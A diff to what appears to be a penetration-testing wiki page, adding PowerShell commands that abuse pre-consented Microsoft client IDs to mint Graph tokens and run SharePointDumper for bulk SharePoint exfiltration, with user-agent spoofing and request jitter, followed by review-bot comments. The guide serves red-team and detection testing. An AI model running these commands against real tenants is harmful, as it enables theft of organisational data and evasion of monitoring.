diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md index 4777919cf..85b9a8059 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md +++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md 
@@ -1176,6 +1176,63 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members {{#endtab }} {{#endtabs }} +## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper) + +Attackers with a **delegated Microsoft Graph token** that includes **`Sites.Read.All`** or **`Sites.ReadWrite.All`** can enumerate **sites/drives/items** over Graph and then **pull file contents** via **SharePoint pre-authentication download URLs** (time-limited URLs embedding an access token). The [SharePointDumper](https://github.com/zh54321/SharePointDumper) script automates the full flow (enumeration → pre-auth downloads) and emits per-request telemetry for detection testing. + +### Obtaining usable delegated tokens + +- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token). +- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations: + +```powershell +# CAE requested by default; yields long-lived (~24h) access token +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE) + +# Other pre-consented clients +Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE) +Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE) +Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE) +Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' 
-Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE) +``` + +> [!NOTE] +> FOCI TRUE clients support refresh across devices; FOCI FALSE clients often require `-Origin` to satisfy reply URL origin validation. + +### Running SharePointDumper for enumeration + exfiltration + +- Basic dump with custom UA / proxy / throttling: + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080' +``` + +- Scope control: include/exclude sites or extensions and global caps: + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100 +``` + +- **Resume** interrupted runs (re-enumerates but skips downloaded items): + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant +``` + +- **Automatic token refresh on HTTP 401** (requires EntraTokenAid loaded): + +```powershell +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74' +``` + +Operational notes: + +- Prefers **CAE-enabled** tokens to avoid mid-run expiry; refresh attempts are **not** logged in the tool’s API log. +- Generates **CSV/JSON request logs** for **Graph + SharePoint** and redacts embedded SharePoint download tokens by default (toggleable). +- Supports **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, and **Ctrl+C-safe shutdown** for traffic shaping during detection/IR tests. + ## Entra ID Privilege Escalation {{#ref}} 
@@ -1245,6 +1302,8 @@ The default mode is **Audit**: ## References - [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units) +- [SharePointDumper](https://github.com/zh54321/SharePointDumper) +- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid) {{#include ../../../banners/hacktricks-training.md}}
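Review bot: The new section (hunk beginning at `## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)`) documents only the operator workflow although its own intro says the tool "emits per-request telemetry for detection testing" and the operational notes describe custom User-Agent, HTTP proxy and per-request delay + jitter "for traffic shaping during detection/IR tests"; add a short defender-facing bullet so readers running those tests know what to key on: the delegated Graph scopes `Sites.Read.All` / `Sites.ReadWrite.All` that make the flow possible, the time-limited SharePoint pre-authentication download URLs used for the content pulls, and the fact that the shown `-UserAgent "Not SharePointDumper"` and `-RequestDelaySeconds 2 -Variation 3` options mean a user-agent string or request rate alone is not a reliable indicator. Two smaller points in the same hunk: the FOCI TRUE/FALSE annotations on the client IDs are asserted without a source, so cite where they come from (the EntraTokenAid project already linked), and "Prefers **CAE-enabled** tokens" lacks a subject; suggest "The tool prefers **CAE-enabled** tokens".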
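Review bot: The two entries added in the `## References` hunk use project names as link text, while the existing entry in the same list uses the full URL as its link text (`[https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)`); for consistency with the list's convention write them as `- [https://github.com/zh54321/SharePointDumper](https://github.com/zh54321/SharePointDumper)` and `- [https://github.com/zh54321/EntraTokenAid](https://github.com/zh54321/EntraTokenAid)`.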